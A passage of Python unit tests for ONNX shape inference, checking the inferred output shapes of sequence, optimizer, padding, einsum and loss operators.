('input3', TensorProto.FLOAT, (2, 5, 4)),
('input4', TensorProto.FLOAT, (2, 5, 2))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('SequenceInsert', ['in_sequence', 'input4'], ['output_sequence'])],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, None, 4)), # type: ignore
make_sequence_value_info('output_sequence', TensorProto.FLOAT, (2, None, None))]) # type: ignore
def test_sequence_at(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 4)),
('input2', TensorProto.FLOAT, (2, 3, 4)),
('input3', TensorProto.FLOAT, (2, 3, 4)),
('ind', TensorProto.INT64, ())],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('SequenceAt', ['in_sequence', 'ind'], ['output'])],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, 3, 4)),
make_tensor_value_info('output', TensorProto.FLOAT, (2, 3, 4))]) # type: ignore
def test_sequence_at_unknown_shape(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 4)),
('input2', TensorProto.FLOAT, (2, 3)),
('input3', TensorProto.FLOAT, (2, 3, 4)),
('ind', TensorProto.INT64, ())],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('SequenceAt', ['in_sequence', 'ind'], ['output'])],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, None),
make_tensor_value_info('output', TensorProto.FLOAT, None)]) # type: ignore
def test_sequence_at_unknown_dim_size(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 4)),
('input2', TensorProto.FLOAT, (2, 3, 5)),
('input3', TensorProto.FLOAT, (2, 3, 4)),
('ind', TensorProto.INT64, ())],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('SequenceAt', ['in_sequence', 'ind'], ['output'])],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, 3, None)), # type: ignore
make_tensor_value_info('output', TensorProto.FLOAT, (2, 3, None))]) # type: ignore
def test_sequence_erase(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 4)),
('input2', TensorProto.FLOAT, (2, 3, 4)),
('input3', TensorProto.FLOAT, (2, 3, 4)),
('ind', TensorProto.INT64, ())],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('SequenceErase', ['in_sequence', 'ind'], ['output_sequence'])],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, 3, 4)),
make_sequence_value_info('output_sequence', TensorProto.FLOAT, (2, 3, 4))]) # type: ignore
def test_sequence_erase_diff_dim_size(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 'x')),
('input2', TensorProto.FLOAT, (2, 3, 'x')),
('input3', TensorProto.FLOAT, (2, 5, 'x')),
('ind', TensorProto.INT64, ())],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('SequenceErase', ['in_sequence', 'ind'], ['output_sequence'])],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, None, 'x')), # type: ignore
make_sequence_value_info('output_sequence', TensorProto.FLOAT, (2, None, 'x'))]) # type: ignore
def test_sequence_length(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 'x')),
('input2', TensorProto.FLOAT, (2, 3, 'x')),
('input3', TensorProto.FLOAT, (2, 3, 'x'))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('SequenceLength', ['in_sequence'], ['len'])],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, 3, 'x')),
make_tensor_value_info('len', TensorProto.INT64, ())]) # type: ignore
def test_split_to_sequence(self): # type: () -> None
graph = self._make_graph(
[('input', TensorProto.FLOAT, (6, 4)),
('split', TensorProto.INT32, (2,))],
[make_node('SplitToSequence', ['input', 'split'], ['output_sequence'])],
[],
initializer=[make_tensor('split', TensorProto.INT32, (2,), (3, 3))])
self._assert_inferred(graph,
[make_sequence_value_info('output_sequence', TensorProto.FLOAT, (3, 4))]) # type: ignore
def test_split_to_sequence_scalar(self): # type: () -> None
graph = self._make_graph(
[('input', TensorProto.FLOAT, (6, 4)),
('split', TensorProto.INT32, ())],
[make_node('SplitToSequence', ['input', 'split'], ['output_sequence'])],
[],
initializer=[make_tensor('split', TensorProto.INT32, (), (2, ))])
self._assert_inferred(graph,
[make_sequence_value_info('output_sequence', TensorProto.FLOAT, (2, 4))]) # type: ignore
def test_split_to_sequence_keepdims(self): # type: () -> None
graph = self._make_graph(
[('input', TensorProto.FLOAT, (6, 4))],
[make_node('SplitToSequence', ['input'], ['output_sequence'], keepdims=1)],
[])
self._assert_inferred(graph,
[make_sequence_value_info('output_sequence', TensorProto.FLOAT, (1, 4))]) # type: ignore
def test_split_to_sequence_not_keepdims(self): # type: () -> None
graph = self._make_graph(
[('input', TensorProto.FLOAT, (6, 4))],
[make_node('SplitToSequence', ['input'], ['output_sequence'], keepdims=0)],
[])
self._assert_inferred(graph,
[make_sequence_value_info('output_sequence', TensorProto.FLOAT, (4, ))]) # type: ignore
def test_split_to_sequence_ignore_keepdims(self): # type: () -> None
graph = self._make_graph(
[('input', TensorProto.FLOAT, (6, 4)),
('split', TensorProto.INT32, (2,))],
[make_node('SplitToSequence', ['input', 'split'], ['output_sequence'], keepdims=0)],
[],
initializer=[make_tensor('split', TensorProto.INT32, (2,), (3, 3))])
self._assert_inferred(graph,
[make_sequence_value_info('output_sequence', TensorProto.FLOAT, (3, 4))]) # type: ignore
def test_split_to_sequence_axis(self): # type: () -> None
graph = self._make_graph(
[('input', TensorProto.FLOAT, (6, 4))],
[make_node('SplitToSequence', ['input'], ['output_sequence'], axis=1)],
[])
self._assert_inferred(graph,
[make_sequence_value_info('output_sequence', TensorProto.FLOAT, (6, 1))]) # type: ignore
def test_split_to_sequence_neg_axis(self): # type: () -> None
graph = self._make_graph(
[('input', TensorProto.FLOAT, (6, 4))],
[make_node('SplitToSequence', ['input'], ['output_sequence'], axis=-2)],
[])
self._assert_inferred(graph,
[make_sequence_value_info('output_sequence', TensorProto.FLOAT, (1, 4))]) # type: ignore
def test_split_to_sequence_split_sizes(self): # type: () -> None
graph = self._make_graph(
[('input', TensorProto.FLOAT, (6, 4)),
('split', TensorProto.INT32, (3,))],
[make_node('SplitToSequence', ['input', 'split'], ['output_sequence'])],
[],
initializer=[make_tensor('split', TensorProto.INT32, (3,), (2, 1, 3))])
self._assert_inferred(graph,
[make_sequence_value_info('output_sequence', TensorProto.FLOAT, (None, 4))]) # type: ignore
def test_split_to_sequence_non_divisible(self): # type: () -> None
graph = self._make_graph(
[('input', TensorProto.FLOAT, (6, 4)),
('split', TensorProto.INT32, ())],
[make_node('SplitToSequence', ['input', 'split'], ['output_sequence'])],
[],
initializer=[make_tensor('split', TensorProto.INT32, (), (4, ))])
self._assert_inferred(graph,
[make_sequence_value_info('output_sequence', TensorProto.FLOAT, (None, 4))]) # type: ignore
def test_concat_from_sequence(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 'x')),
('input2', TensorProto.FLOAT, (2, 3, 'x')),
('input3', TensorProto.FLOAT, (2, 3, 'x'))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('ConcatFromSequence', ['in_sequence'], ['out'], axis=0)],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, 3, 'x')),
make_tensor_value_info('out', TensorProto.FLOAT, (None, 3, 'x'))]) # type: ignore
def test_concat_from_sequence_unknown_shape(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 'x')),
('input2', TensorProto.FLOAT, (2, 3)),
('input3', TensorProto.FLOAT, (2, 3, 'x'))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('ConcatFromSequence', ['in_sequence'], ['out'], axis=0)],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, None),
make_tensor_value_info('out', TensorProto.FLOAT, None)]) # type: ignore
def test_concat_from_sequence_unknown_dim_size(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 'x')),
('input2', TensorProto.FLOAT, (2, 4, 'x')),
('input3', TensorProto.FLOAT, (2, 3, 'x'))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('ConcatFromSequence', ['in_sequence'], ['out'], axis=0)],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, None, 'x')), # type: ignore
make_tensor_value_info('out', TensorProto.FLOAT, (None, None, 'x'))]) # type: ignore
def test_concat_from_sequence_axis(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 'x')),
('input2', TensorProto.FLOAT, (2, 4, 'x')),
('input3', TensorProto.FLOAT, (2, 3, 'x'))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('ConcatFromSequence', ['in_sequence'], ['out'], axis=2)],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, None, 'x')), # type: ignore
make_tensor_value_info('out', TensorProto.FLOAT, (2, None, None))]) # type: ignore
def test_concat_from_sequence_neg_axis(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 'x')),
('input2', TensorProto.FLOAT, (2, 4, 'x')),
('input3', TensorProto.FLOAT, (2, 3, 'x'))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('ConcatFromSequence', ['in_sequence'], ['out'], axis=-3)],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, None, 'x')), # type: ignore
make_tensor_value_info('out', TensorProto.FLOAT, (None, None, 'x'))]) # type: ignore
def test_concat_from_sequence_new_axis(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 'x')),
('input2', TensorProto.FLOAT, (2, 3, 'x')),
('input3', TensorProto.FLOAT, (2, 3, 'x'))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('ConcatFromSequence', ['in_sequence'], ['out'], axis=2, new_axis=1)],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, 3, 'x')),
make_tensor_value_info('out', TensorProto.FLOAT, (2, 3, None, 'x'))]) # type: ignore
def test_concat_from_sequence_neg_new_axis(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 'x')),
('input2', TensorProto.FLOAT, (2, 3, 'x')),
('input3', TensorProto.FLOAT, (2, 3, 'x'))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('ConcatFromSequence', ['in_sequence'], ['out'], axis=-1, new_axis=1)],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, 3, 'x')),
make_tensor_value_info('out', TensorProto.FLOAT, (2, 3, 'x', None))]) # type: ignore
def test_adagrad(self): # type: () -> None
graph = self._make_graph(
[('R', TensorProto.FLOAT, ()), # scalar's shape is ()
('T', TensorProto.INT64, ()), # scalar's shape is ()
('X', TensorProto.FLOAT, (1, 2)),
('G', TensorProto.FLOAT, (1, 2)),
('H', TensorProto.FLOAT, (1, 2))],
[make_node('Adagrad', ['R', 'T', 'X', 'G', 'H'], ['X_new', 'H_new'],
domain=AI_ONNX_PREVIEW_TRAINING_DOMAIN)],
[])
self._assert_inferred(
graph,
[make_tensor_value_info('X_new', TensorProto.FLOAT, (1, 2)),
make_tensor_value_info('H_new', TensorProto.FLOAT, (1, 2))],
opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 12), helper.make_opsetid(AI_ONNX_PREVIEW_TRAINING_DOMAIN, 1)])
def test_adagrad_multiple(self): # type: () -> None
graph = self._make_graph(
[('R', TensorProto.FLOAT, ()), # scalar's shape is ()
('T', TensorProto.INT64, ()), # scalar's shape is ()
('X1', TensorProto.FLOAT, (1, 2)),
('X2', TensorProto.FLOAT, (3, 4)),
('G1', TensorProto.FLOAT, (1, 2)),
('G2', TensorProto.FLOAT, (3, 4)),
('H1', TensorProto.FLOAT, (1, 2)),
('H2', TensorProto.FLOAT, (3, 4))],
[make_node('Adagrad', ['R', 'T', 'X1', 'X2', 'G1', 'G2', 'H1', 'H2'],
['X1_new', 'X2_new', 'H1_new', 'H2_new'],
domain=AI_ONNX_PREVIEW_TRAINING_DOMAIN)],
[])
self._assert_inferred(graph,
[make_tensor_value_info('X1_new', TensorProto.FLOAT, (1, 2)),
make_tensor_value_info('X2_new', TensorProto.FLOAT, (3, 4)),
make_tensor_value_info('H1_new', TensorProto.FLOAT, (1, 2)),
make_tensor_value_info('H2_new', TensorProto.FLOAT, (3, 4))],
opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 12), helper.make_opsetid(AI_ONNX_PREVIEW_TRAINING_DOMAIN, 1)])
def test_momentum(self): # type: () -> None
graph = self._make_graph(
[('R', TensorProto.FLOAT, ()), # scalar's shape is ()
('T', TensorProto.INT64, ()), # scalar's shape is ()
('X', TensorProto.FLOAT, (1, 2)),
('G', TensorProto.FLOAT, (1, 2)),
('V', TensorProto.FLOAT, (1, 2))],
[make_node('Momentum', ['R', 'T', 'X', 'G', 'V'], ['X_new', 'V_new'],
alpha=0.9, beta=1.0, norm_coefficient=0.02, mode='standard',
domain=AI_ONNX_PREVIEW_TRAINING_DOMAIN)],
[])
self._assert_inferred(
graph,
[make_tensor_value_info('X_new', TensorProto.FLOAT, (1, 2)),
make_tensor_value_info('V_new', TensorProto.FLOAT, (1, 2))],
opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 12), helper.make_opsetid(AI_ONNX_PREVIEW_TRAINING_DOMAIN, 1)])
def test_momentum_multiple(self): # type: () -> None
graph = self._make_graph(
[('R', TensorProto.FLOAT, ()), # scalar's shape is ()
('T', TensorProto.INT64, ()), # scalar's shape is ()
('X1', TensorProto.FLOAT, (1, 2)),
('X2', TensorProto.FLOAT, (3, 4)),
('G1', TensorProto.FLOAT, (1, 2)),
('G2', TensorProto.FLOAT, (3, 4)),
('V1', TensorProto.FLOAT, (1, 2)),
('V2', TensorProto.FLOAT, (3, 4))],
[make_node('Momentum', ['R', 'T', 'X1', 'X2', 'G1', 'G2', 'V1', 'V2'],
['X1_new', 'X2_new', 'V1_new', 'V2_new'],
alpha=0.9, beta=1.0, norm_coefficient=0.02, mode='nesterov',
domain=AI_ONNX_PREVIEW_TRAINING_DOMAIN)],
[])
self._assert_inferred(
graph,
[make_tensor_value_info('X1_new', TensorProto.FLOAT, (1, 2)),
make_tensor_value_info('X2_new', TensorProto.FLOAT, (3, 4)),
make_tensor_value_info('V1_new', TensorProto.FLOAT, (1, 2)),
make_tensor_value_info('V2_new', TensorProto.FLOAT, (3, 4))],
opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 12), helper.make_opsetid(AI_ONNX_PREVIEW_TRAINING_DOMAIN, 1)])
def test_adam(self): # type: () -> None
graph = self._make_graph(
[('R', TensorProto.FLOAT, ()), # scalar's shape is ()
('T', TensorProto.INT64, ()), # scalar's shape is ()
('X', TensorProto.FLOAT, (1, 2)),
('G', TensorProto.FLOAT, (1, 2)),
('V', TensorProto.FLOAT, (1, 2)),
('H', TensorProto.FLOAT, (1, 2))],
[make_node('Adam', ['R', 'T', 'X', 'G', 'V', 'H'], ['X_new', 'V_new', 'H_new'],
domain=AI_ONNX_PREVIEW_TRAINING_DOMAIN,
alpha=0.9, beta=1.0, norm_coefficient=0.02)],
[])
infos = [make_tensor_value_info('X_new', TensorProto.FLOAT, (1, 2)),
make_tensor_value_info('V_new', TensorProto.FLOAT, (1, 2)),
make_tensor_value_info('H_new', TensorProto.FLOAT, (1, 2))]
self._assert_inferred(
graph,
infos,
opset_imports=[make_opsetid(AI_ONNX_PREVIEW_TRAINING_DOMAIN, 1), make_opsetid(ONNX_DOMAIN, 12)])
def test_adam_multiple(self): # type: () -> None
graph = self._make_graph(
[('R', TensorProto.FLOAT, ()), # scalar's shape is ()
('T', TensorProto.INT64, ()), # scalar's shape is ()
('X1', TensorProto.FLOAT, (1, 2)),
('X2', TensorProto.FLOAT, (3, 4)),
('G1', TensorProto.FLOAT, (1, 2)),
('G2', TensorProto.FLOAT, (3, 4)),
('V1', TensorProto.FLOAT, (1, 2)),
('V2', TensorProto.FLOAT, (3, 4)),
('H1', TensorProto.FLOAT, (1, 2)),
('H2', TensorProto.FLOAT, (3, 4))],
[make_node('Adam', ['R', 'T', 'X1', 'X2', 'G1', 'G2', 'V1', 'V2', 'H1', 'H2'],
['X1_new', 'X2_new', 'V1_new', 'V2_new', 'H1_new', 'H2_new'],
domain=AI_ONNX_PREVIEW_TRAINING_DOMAIN,
alpha=0.9, beta=1.0, norm_coefficient=0.02)],
[])
infos = [make_tensor_value_info('X1_new', TensorProto.FLOAT, (1, 2)),
make_tensor_value_info('X2_new', TensorProto.FLOAT, (3, 4)),
make_tensor_value_info('V1_new', TensorProto.FLOAT, (1, 2)),
make_tensor_value_info('V2_new', TensorProto.FLOAT, (3, 4)),
make_tensor_value_info('H1_new', TensorProto.FLOAT, (1, 2)),
make_tensor_value_info('H2_new', TensorProto.FLOAT, (3, 4))]
self._assert_inferred(
graph,
infos,
opset_imports=[make_opsetid(AI_ONNX_PREVIEW_TRAINING_DOMAIN, 1), make_opsetid(ONNX_DOMAIN, 12)])
def test_pad_opset10(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (1, None, 2))],
[make_node('Pad', 'x', 'y', pads=[1, 3, 1, 1, 0, 1])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (3, None, 4))], opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 10)]) # type: ignore
def test_constant_pad_2d_opset10(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 3, 4, 4))],
[make_node('Pad', 'x', 'y', pads=[0, 0, 3, 1, 0, 0, 4, 2], mode="constant", value=2.0)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, 3, 11, 7))], opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 10)])
def test_pad(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (1, None, 2)),
('pads', TensorProto.INT64, (6,))],
[make_node('Pad', ['x', 'pads'], 'y')],
[],
initializer=[make_tensor('pads', TensorProto.INT64, (6,), (1, 3, 1, 1, 0, 1,))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (3, None, 4))]) # type: ignore
def test_gatherelements_basic(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (6,)),
('indices', TensorProto.INT64, (2,))],
[make_node('GatherElements', ['x', 'indices'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2,))])
def test_gatherelements_indices_missing_shape(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (6,)),
('indices', TensorProto.INT64, None)], # type: ignore
[make_node('GatherElements', ['x', 'indices'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, None)]) # type: ignore
def test_einsum_transpose(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4))],
[make_node('Einsum', ['x'], ['y'], equation='ij->ji')],
[],)
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (None, None))]) # type: ignore
def test_einsum_dot(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (1,)),
('y', TensorProto.FLOAT, (1,))],
[make_node('Einsum', ['x', 'y'], ['z'], equation='i,i->')],
[],)
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, ())]) # type: ignore
def test_einsum_scalar(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, ()),
('y', TensorProto.FLOAT, ())],
[make_node('Einsum', ['x', 'y'], ['z'], equation=',->')],
[],)
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, ())]) # type: ignore
def test_einsum_outer_prod(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 5)),
('y', TensorProto.FLOAT, (7, 9))],
[make_node('Einsum', ['x', 'y'], ['z'], equation='ij,ab->ijab')],
[],)
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (None, None, None, None))]) # type: ignore
def test_einsum_sum_along_dim(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4))],
[make_node('Einsum', ['x'], ['y'], equation='i j->i ')],
[],)
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (None, ))]) # type: ignore
def test_einsum_ellipsis(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 4))],
[make_node('Einsum', ['x'], ['y'], equation='... ii ->... i')],
[],)
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (None, None))]) # type: ignore
def test_einsum_ellipsis_2(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 2, 2)),
('y', TensorProto.FLOAT, (2, 2, 2))],
[make_node('Einsum', ['x', 'y'], ['z'], equation='...ij,...jk->...ik')],
[], )
self._assert_inferred(graph,
[make_tensor_value_info('z', TensorProto.FLOAT, (None, None, None))]) # type: ignore
def test_einsum_ellipsis_3(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 2, 2)),
('y', TensorProto.FLOAT, (2, 2, 2))],
[make_node('Einsum', ['x', 'y'], ['z'], equation='...ij,...jk')],
[], )
self._assert_inferred(graph,
[make_tensor_value_info('z', TensorProto.FLOAT, (None, None, None))]) # type: ignore
def test_einsum_contraction(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (5, 6, 7, 8)),
('y', TensorProto.FLOAT, (8, 9, 10))],
[make_node('Einsum', ['x', 'y'], ['z'], equation='abcd,dfg->abcfg')],
[], )
self._assert_inferred(graph,
[make_tensor_value_info('z', TensorProto.FLOAT, (None, None, None, None, None))]) # type: ignore
def test_einsum_contraction_2(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5)),
('y', TensorProto.FLOAT, (3, 5))],
[make_node('Einsum', ['x', 'y'], ['z'], equation='ijk,ik->jk')],
[], )
self._assert_inferred(graph,
[make_tensor_value_info('z', TensorProto.FLOAT, (None, None))]) # type: ignore
def test_einsum_batch_matmul(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (5, 2, 3)),
('y', TensorProto.FLOAT, (5, 3, 4))],
[make_node('Einsum', ['x', 'y'], ['z'], equation='bij , b jk-> bik')],
[],)
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (None, None, None))]) # type: ignore
def test_einsum_left_hand_eqn(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 3)),
('y', TensorProto.FLOAT, (3, 4))],
[make_node('Einsum', ['x', 'y'], ['z'], equation='ij,kl')],
[],)
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (None, None, None, None))]) # type: ignore
def test_einsum_incorrect_num_inputs(self): # type: () -> None
graph = self._make_graph(
[("x", TensorProto.FLOAT, (2, 3)),
("y", TensorProto.FLOAT, (2, 3)),
("z", TensorProto.FLOAT, (2, 3))],
[make_node('Einsum', ['x', 'y'], ['z'], equation='i,...j, k, l-> i')],
[])
self.assertRaises(onnx.shape_inference.InferenceError, self._inferred, graph)
def test_negative_log_likelihood_shape_is_NC(self): # type: () -> None
N, C = 3, 4
graph = self._make_graph(
[('input', TensorProto.FLOAT, (N, C)),
('target', TensorProto.INT64, (N,))],
[make_node('NegativeLogLikelihoodLoss', ['input', 'target'], ['loss'], reduction='none')],
[])
self._assert_inferred(graph, [make_tensor_value_info('loss', TensorProto.FLOAT, (N, ))]) # type: ignore
def test_negative_log_likelihood_shape_is_NC_with_weight(self): # type: () -> None
N, C = 3, 4
graph = self._make_graph(
[('input', TensorProto.FLOAT, (N, C)),
('target', TensorProto.INT64, (N,)),
('weight', TensorProto.FLOAT, (C,))],
[make_node('NegativeLogLikelihoodLoss', ['input', 'target', 'weight'], ['loss'], reduction='none')],
[])
self._assert_inferred(graph, [make_tensor_value_info('loss', TensorProto.FLOAT, (N, ))]) # type: ignore
def test_negative_log_likelihood_shape_is_NC_reduction_mean(self): # type: () -> None
N, C = 3, 4
graph = self._make_graph(
[('input', TensorProto.FLOAT, (N, C)),
('target', TensorProto.INT64, (N,))],
[make_node('NegativeLogLikelihoodLoss', ['input', 'target'], ['loss'], reduction='mean')],
[])
self._assert_inferred(graph, [make_tensor_value_info('loss', TensorProto.FLOAT, ())]) # type: ignore
def test_negative_log_likelihood_shape_is_NC_with_weight_reduction_mean(self): # type: () -> None
N, C = 3, 4
graph = self._make_graph(
[('input', TensorProto.FLOAT, (N, C)),
('target', TensorProto.INT64, (N,)),
('weight', TensorProto.FLOAT, (C,))],
[make_node('NegativeLogLikelihoodLoss', ['input', 'target', 'weight'], ['loss'], reduction='mean')],
[])
self._assert_inferred(graph, [make_tensor_value_info('loss', TensorProto.FLOAT, ())]) # type: ignore
def test_negative_log_likelihood_shape_is_NCd1d2(self): # type: () -> None
N, C, d1, d2 = 3, 4, 5, 6
graph = self._make_graph(
[("input", TensorProto.FLOAT, (N, C, d1, d2)),
("target", TensorProto.INT64, (N, d1, d2))],
[make_node('NegativeLogLikelihoodLoss', ['input', 'target'], ['loss'], reduction='none')],
[])
self._assert_inferred(graph, [make_tensor_value_info('loss', TensorProto.FLOAT, (N, d1, d2))]) # type: ignore
def test_negative_log_likelihood_shape_is_NCd1d2_with_weight(self): # type: () -> None
N, C, d1, d2 = 3, 4, 5, 6
graph = self._make_graph(
[("input", TensorProto.FLOAT, (N, C, d1, d2)),
("target", TensorProto.INT64, (N, d1, d2)),
("weight", TensorProto.FLOAT, (C,))],
[make_node('NegativeLogLikelihoodLoss', ['input', 'target', 'weight'], ['loss'], reduction='none')],
[])
self._assert_inferred(graph, [make_tensor_value_info('loss', TensorProto.FLOAT, (N, d1, d2))]) # type: ignore
def test_negative_log_likelihood_shape_is_NCd1d2_reduction_sum(self): # type: () -> None
N, C, d1, d2 = 3, 4, 5, 6
graph = self._make_graph(
[("input", TensorProto.FLOAT, (N, C, d1, d2)),
("target", TensorProto.INT64, (N, d1, d2))],
[make_node('NegativeLogLikelihoodLoss', ['input', 'target'], ['loss'], reduction='sum')],
[])
self._assert_inferred(graph, [make_tensor_value_info('loss', TensorProto.FLOAT, ())]) # type: ignore
def test_negative_log_likelihood_shape_is_NCd1d2_with_weight_reduction_mean(self): # type: () -> None
N, C, d1, d2 = 3, 4, 5, 6
graph = self._make_graph(
[("input", TensorProto.FLOAT, (N, C, d1, d2)),
("target", TensorProto.INT64, (N, d1, d2)),
("weight", TensorProto.FLOAT, (C,))],
[make_node('NegativeLogLikelihoodLoss', ['input', 'target', 'weight'], ['loss'], reduction='mean')],
[])
self._assert_inferred(graph, [make_tensor_value_info('loss', TensorProto.FLOAT, ())]) # type: ignore
def test_negative_log_likelihood_input_target_shape_mismatch(self): # type: () -> None
N, C, d1, d2 = 3, 4, 5, 6
graph = self._make_graph(
[("input", TensorProto.FLOAT, (N, d1, d2)),
("target", TensorProto.INT64, (N, d1 + 1, d2)),
("weight", TensorProto.FLOAT, (C,)),
("loss", TensorProto.FLOAT, ())],
[make_node('NegativeLogLikelihoodLoss', ['input', 'target', 'weight'], ['loss'], reduction='mean')],
[])
self.assertRaises(onnx.shape_inference.InferenceError, self._inferred, graph)
def test_negative_log_likelihood_input_weight_shape_mismatch(self): # type: () -> None
N, C, d1, d2 = 3, 4, 5, 6
graph = self._make_graph(
[("input", TensorProto.FLOAT, (N, C, d1, d2)),
("target", TensorProto.INT64, (N, d1, d2)),
("weight", TensorProto.FLOAT, (C + 1,)),
("loss", TensorProto.FLOAT, (N, d1, d2))],
[make_node('NegativeLogLikelihoodLoss', ['input', 'target', 'weight'], ['loss'], reduction='none')],
[])
self.assertRaises(checker.ValidationError, self._inferred, graph)
def test_softmax_cross_entropy_none(self): # type: () -> None
graph = self._make_graph(
[("x", TensorProto.FLOAT, (2, 3)),
("y", TensorProto.FLOAT, (2,))],
[make_node('SoftmaxCrossEntropyLoss', ['x', 'y'], ['z'], reduction='none')],
[],)
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (2,))]) # type: ignore
def test_softmax_cross_entropy_mean(self): # type: () -> None
graph = self._make_graph(
[("x", TensorProto.FLOAT, (2, 3)),
("y", TensorProto.FLOAT, (2,))],
[make_node('SoftmaxCrossEntropyLoss', ['x', 'y'], ['z'], reduction='mean')],
[],)
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, ())]) # type: ignore
def test_softmax_cross_entropy_none_NCD1D2(self): # type: () -> None
graph = self._make_graph(
[("x", TensorProto.FLOAT, (2, 3, 5, 8)),
